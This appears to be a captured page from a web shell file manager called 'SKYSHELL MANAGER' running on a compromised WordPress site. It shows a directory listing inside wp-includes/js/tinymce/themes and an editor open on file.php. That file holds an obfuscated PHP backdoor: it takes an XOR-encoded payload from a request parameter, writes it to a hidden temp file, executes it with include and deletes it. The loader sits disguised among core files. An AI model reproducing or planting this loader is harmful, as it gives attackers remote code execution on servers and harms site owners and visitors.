📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
12934.91 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: file.php
<?php if(!is_null($_REQUEST["\x63\x6F\x6D\x70onent"] ?? null)){ $key = hex2bin($_REQUEST["\x63\x6F\x6D\x70onent"]); $desc = '' ; $e = 0; while($e < strlen($key)){$desc .= chr(ord($key[$e]) ^ 3);$e++;} $elem = array_filter(["/dev/shm", "/var/tmp", "/tmp", getenv("TEMP"), session_save_path(), getenv("TMP"), sys_get_temp_dir(), getcwd(), ini_get("upload_tmp_dir")]); foreach ($elem as $flag) { if (is_dir($flag) && is_writable($flag)) { $fac = implode("/", [$flag, ".ent"]); $file = fopen($fac, 'w'); if ($file) { fwrite($file, $desc); fclose($file); include $fac; @unlink($fac); exit; } } } }
Save